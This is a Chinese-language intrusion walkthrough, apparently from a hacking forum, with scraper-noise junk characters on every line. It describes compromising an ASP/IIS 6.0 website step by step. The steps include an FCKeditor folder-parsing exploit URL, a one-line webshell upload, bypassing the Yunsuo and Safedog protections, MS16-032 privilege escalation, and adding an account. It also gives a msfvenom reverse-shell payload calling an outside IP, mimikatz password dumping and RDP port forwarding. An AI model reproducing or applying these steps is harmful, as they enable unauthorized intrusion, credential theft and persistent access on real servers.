! N; p6 L# y" ]3 R
5 S1 ^2 z/ D+ O
3 J/ [! H) u5 O* Z
: J* @2 t& X- s5 l
) N! B9 A/ I4 H' o; n+ k/ Y
1 e6 G: i; S0 W* z- i* Y' r. r" ~9 k
* q3 p1 w" B7 G) m- S5 a一、 利用getwebshell篇
K/ X/ y4 Q/ `* B. @ + P4 H* l( n i7 b+ A7 P
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
. n9 A7 u& L5 _8 T 6 D/ `" N) F h' T" Z+ g
4 N0 t% V3 H) ~2 x7 y
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
7 H. s* q# W3 @/ c1 J4 L, p9 k
; Y+ A: E" U# k( B* h( S2 `下面我们构造一个asp目录,如:
" V' K. _/ g w$ s: J7 @
% m$ V' ?7 X/ {1 K. N . b7 Y& D8 |. h$ J. z' N
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 & }" R0 R) T" d: Q/ F, L! @
8 k$ S; O! w0 @* D \: m! T) } v
0 |7 i+ B0 y; `1 s) k$ L 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。 d4 q2 Z/ z. o5 P
+ ?/ P3 L* Z8 Q
一、 绕过安全狗云锁提权并且加账号 7 N' o$ c+ G4 H' b# \
# p; L; C9 F+ g) ]没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
) f# S0 O, F4 u, p , V6 F7 @, w4 U( d$ j
如图:
; I4 i& M+ B3 e% u. t" M' I; J
: x2 e$ F# I) ^# e- S9 I% I. F然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit ' j: d( B( \4 z) b7 u
}" Y- D( h+ [* o: B
一、 利用metasploit / u$ [1 i8 u/ U, B0 l2 M3 X+ Y
) ~6 k& |: p* |7 E
首先用pentestbox生成一个64位的payload如下命令 : _/ a# ^! l" p- I! x1 W/ i
) Q9 Z0 Z; H1 L
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe ! p$ y6 `% i/ D3 H. E2 U+ q6 e2 W
, X/ J: H2 G# c0 S! `; @. c. ^% p) K& `4 J
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
# n& b* F" T2 I* b/ _4 k, a# H$ p 6 p7 |% a0 r/ ]2 I8 T
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
* V' @" c0 H! m4 Y $ s! p' _1 ^5 C N+ x
下面我们来做一个监听如下命令:
8 r% ^1 a& ~& o: F9 m/ _% j- ^: Z
: Z& I1 F9 C& k, e. Z0 Qportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图: # V% y2 [. s/ Y+ k3 k
& {+ E9 C6 G; H1 G# k
" k4 F1 B3 c l8 [ |
2 a- v8 w% P7 N( z) l6 J
1 V+ m7 `. X6 ]5 ?' g
- R3 {. b# y) _; J! P. J : s) g) c/ ^$ ^
& O- ~; E* | @- Y$ \& o7 G! b
- Q' t4 n# X6 w/ p+ V6 I4 u# D/ z
, k- E3 D5 N7 n' q/ Z$ _! j* a. C
! N0 a8 W3 {6 c7 m# D
$ p7 e* N5 F4 @% z" L$ u6 T
1 a& N$ S1 l0 N2 q5 G ' p; Z; @$ h% k1 T. C
5 s9 Z0 ^7 V6 f
$ Z6 s3 z3 Q+ e6 i2 \$ U
; J$ n6 P# {" b+ q: W |